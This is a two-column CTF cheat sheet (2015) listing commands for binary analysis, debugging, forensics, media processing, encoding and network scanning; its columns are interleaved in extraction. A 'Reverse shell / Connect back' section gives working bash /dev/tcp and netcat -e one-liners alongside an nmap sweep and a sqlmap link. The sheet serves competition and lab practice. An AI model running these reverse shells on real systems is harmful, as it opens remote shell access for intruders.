Concise Capture the Flag Cheat Sheet                                 Disassembly                                                           Image Processing
Disassemble program             $ objdump -d prog                     Editor (simple)              $ pinta image
Binaries and Metadata Extractors                                           Dump RO data section            $ objdump -j .rodata -s prog          Editor (advanced)            $ gimp image
                                                                           List symbols from program       $ nm prog                             Convert to pnm               $ type topnm image.type > image.pnm
 Guess file type using magic          $   file file
                                                                           Disassemble (ndisasm)           $ ndisasm prog                        pnm (ppm) format             P6                   (type)
 Printable strings in binary file     $   strings file
                                                                           Disasm. ncurses                 $ TERM=vt100 biew prog                                             width height         (in printable digits)
 Hexadecimal dump                     $   xxd [-c16 -g2 ] file
                                                                           Assembly                        nasm, yasm, gas                                                    255                  (max color)
                                      $   hexdump file
                                                                                                                                                                              RGBRGBRGBRGBRGB... (× width × height)
                                      $   od -tx1z file
                                                                                                                                                 Bar/qrcode scanner           $ zbarimg --raw image.png
 Binary hexadecimal editor            $   elvis [-c"display hex"] file    Debugging                                                              Gen. qrcode for word         $ qrencode word -o image.png
 Extract JPEG EXIF data               $   exiv2 img.jpeg
                                                                                                                                                  (from X selection)          $ import i.png && zbarimg --raw i.png
                                      $   jhead img.jpeg                   simple / command line          $   gdb ./program
                                                                                                                                                 OCR in lng lang.             $ tesseract [-l lng ] i.png stdout
 Extract PNG metadata                 $   pngcheck -7ptv img.png           run program                    >   r [parameters] [< re > directs]
                                                                                                                                                 Crop                         $ convert -crop W xH +HP +VP i.png o.png
 List tarball contents                $   tar -tf tarball.tar              print backtrace                >   bt
                                                                                                                                                 Montage/Concat               $ montage -mode concatenate *.png o.png
 List zip contents                    $   unzip -l file.zip                set breakpoint on foo          >   b foo
 Extract ID3 metadata                 $   id3info file.mp3                 unset breakpoint(s)            >   delete breakpoint [no]
                                                                           next line (over)               >   n
                                                                           step line (into)               >   s
                                                                                                                                                Video Processing
Encoding / Decoding                                                        next instruction (over)        >   ni
                                                                                                                                                 Extract Frames              $ ffmpeg -i video.mp4 frame-%4d.jpeg
                                                                           step instruction (into)        >   si
 Encode base64          $   base64 [file ]                                                                                                       Downl. vid. (yt/etc)        $ youtube-dl "https://example.com/etc "
                                                                           activate display next instr.   >   display/i $pc
 Decode base64          $   base64 -di [file ]
                                                                           continue execution             >   c
 (de)code caesar’s      $   caesar [0-25]
                                                                           save memory contents           >   generate-core-file
 Encode morse           $   morse -s       message
                                                                           advanced / graphical           $   edb ./program
                                                                                                                                                Audio Processing
 Decode morse           $   morse -d --    ... --- ...
                                                                           trace system calls             $   strace ./program                   Graphical editor / waveform          $   audacity audio.flac
                                                                                                                                                 Spectrogram                          $   sox audio.flac -n spectrogram
Hashes                                                                    Running and debugging Legacy/Other Systems                             Extract notes from MIDI              $   midi2ly music.midi
 md5sum          $ md5sum file                                                                                                                   Generate music sheet                 $   lilypond music.ly
                                                                          DOS
 sha1sum         $ sha1sum file
                                                                           Open DOS with dir as C:             $ dosbox dir                     Decoding Phone Dialing Tones
 sha256sum       $ sha256sum file
                                                                            (debug mode)                       $ dosbox-debug dir
                                                                           Run prog in debug mode              C:\> debug prog.com               Decode DTMF          sox tone.ogg -esigned-integer \
Unix / Linux                                                               DOSBox-debug step over              F10                                                        -b16 -r 22050 -t raw - |
                                                                           DOSBox-debug step into              F11                                                    multimon-ng -c -a DTMF -
 Extract tarball contents        $ tar -xvf tarball.tar                    DOSBox-debug scroll memory          PgUp / PgDn                       Anything else        sox ... | multimon-ng
 Remove first 3 bytes            $ tail -c +4 [file ]                      DOSBox-debug scroll program         + / -
 Unzip                           $ unzip file.zip
                                                                          Windows
Disk Images / Forensics                                                    Run executable        $ wine prog.exe
                                                                           Debug executable      $ winedbg prog.exe
 Mounting FS image                           $ mount fs.img mountpoint     Debug executable      $ ollydbg prog.exe
   (override user/group)                        -o uid=user,gid=users
 List orphan inodes on disk image            $ ils fs.img
 List deleted files on disk image            $ fls -drp fs.img
                                                                          IBM PC XT
 Output file contents from inode no.         $ icat fs.img 1337            Start system    fake86 -fd0 /usr/share/fake86/rombasic.bin
 (Deleted) file contents on disk img.        $ fcat path/to/file fs.img
                                                                          Android
Databases                                                                  dex to jar      d2j-dex2jar classes.dex
                                                                           jar contents    unzip classes.jar
 Open sqlite database        $   sqlite3 database.db
 List databases              >   .databases
 List tables                 >   .tables
 Show table contents         >   select * from table ;
Copyright 2014-2015, Rudy Matela – Compiled on September 20, 2015                           Concise Capture the Flag Cheat Sheet v0.4           This text is available under the Creative Commons Attribution-ShareAlike 3.0 Licence,
Upstream: https://github.com/rudymatela/ultimate-cheat-sheets                                                                                         or (at your option), the GNU Free Documentation License version 1.3 or Later.
Networking                                                             Keyboard Scan Codes (US QWERTY)                                         Stuff to install                                                    (Arch Linux)
 Info about port      $ cat /etc/services | grep port                           00       10        20        30         40           50         Image processing           $   pacman   -S pinta gimp netpbm
                                                                                                                                                Image metadata             $   pacman   -S jhead exiv2 pngcheck
                                                                        +0      error    q         d         b          F6           KP 2
Passive scanning                                                                                                                                QR/Barcode                 $   pacman   -S zbar qrencode
                                                                        +1      Esc      w         f         n          F7           KP 3
                                                                                                                                                Disk image                 $   pacman   -S sleuthkit libewf
                                                                        +2      1        e         g         m          F8           KP 0
 Network traffic (graphical)      $   wireshark                                                                                                 Networking (act.)          $   pacman   -S {gnu,openbsd}-netcat nmap
                                                                        +3      2        r         h         ,<         F9           KP Del
 Network traffic                  $   tshark -i interface -f filter                                                                             Networking (psv.)          $   pacman   -S wireshark-{cli,gtk} tcpdump
                                                                        +4      3        t         j         . >        F10          SysRq
 List interfaces                  $   tshark -D                                                                                                 OCR                        $   pacman   -S tesseract tesseract-data-eng
                                                                        +5      4        y         k         /?         NmLck        –
 Wifi HTTP traffic                $   tshark -i wlan0 -f "port 80"                                                                              Encoding/Decoding          $   pacman   -S bsdgames
                                                                        +6      5        u         l         RShift     ScLck        –
 Filter syntax                    $   man pcap-filter                                                                                           8086 emulator              $   pacman   -U fake86-???.pkg.tar.gz # AUR
                                                                        +7      6        i         : ;       KP *       KP 7         F11
 Network traffic (altn.)          $   tcpdump                                                                                                   Dial Tones                 $   pacman   -S archassault/multimon-ng
                                                                        +8      7        o         ’"        LAlt       KP 8         F12
                                                                                                                                                Android                    $   pacman   -S archassault/dex2jar
                                                                        +9      8        p         ‘         Space      KP 9         –
Active scanning                                                                                                                                 Tools available            $   pacman   -Ql somekit | grep /bin/
                                                                        +a      9        {[        LShift    CaLck      KP -         –
                                                                        +b      0        ]}        \|        F1         KP 4         –
 Open ports on host              $ nmap [-sV -O -p prange ] host
                                                                        +c      -_       Enter     z         F2         KP 5         –         Other stuff
 List hosts on a network         $ nmap [-sn] 192.168.0.*
                                                                        +d      +=       LCtrl     x         F3         KP 6         –
 Query txt DNS field             $ nslookup -query=txt example.com      +e      Back     a         c         F4         KP +         –          SQLi     https://github.com/sqlmapproject/sqlmap
 Query DNS info (on srv )        $ dig [@srv] example.com               +f      Tab      s         v         F5         KP 1         –
Interacting                                                            Number/character conversion
 Network cat (GNU/BSD)            $ netcat host port
 Network cat (nmap altn.)         $ ncat host port                                            Ruby                 Haskell
 Telnet to host on port           $ telnet host port                    lib                                        import Data.Char
                                                                        char to int           ’a’.ord              ord ’a’
                                                                        int to char           0x61.chr             chr 0x61
Reverse shell / Connect back
                                                                        from hexadecimal      "FF".to_i(16)        foldl1 (\x y -> x*16 + y)
 netcat listen              client$ netcat -vlp 1337                                                               . map digitToInt $ "FF"
 Linux connect back         $   sh >& /dev/tcp/client/1337 0>&1         to hexadecimal        255.to_s(16)         map intToDigit . reverse
   (colored)                $   bash -i >& /dev/tcp/client/1337 0>&1                                               . unfoldr
 Netcat connect back        $   netcat -e /bin/sh localhost 1337                                                     (\n -> listToMaybe
   (colored)                $   nc -e "/bin/bash -i" localhost 1337                                                   [ swap $ n ‘divMod‘ 16
                                                                                                                      | n /= 0 ])
                                                                                                                   $ 255
                                                                       Dates
                                                                        Unix to Human      date -d "@seconds"
                                                                        Human to Unix      date -d "YYYY-mm-dd HH:MM:SS" -f +%s
Copyright 2014-2015, Rudy Matela – Compiled on September 20, 2015                        Concise Capture the Flag Cheat Sheet v0.4             This text is available under the Creative Commons Attribution-ShareAlike 3.0 Licence,
Upstream: https://github.com/rudymatela/ultimate-cheat-sheets                                                                                        or (at your option), the GNU Free Documentation License version 1.3 or Later.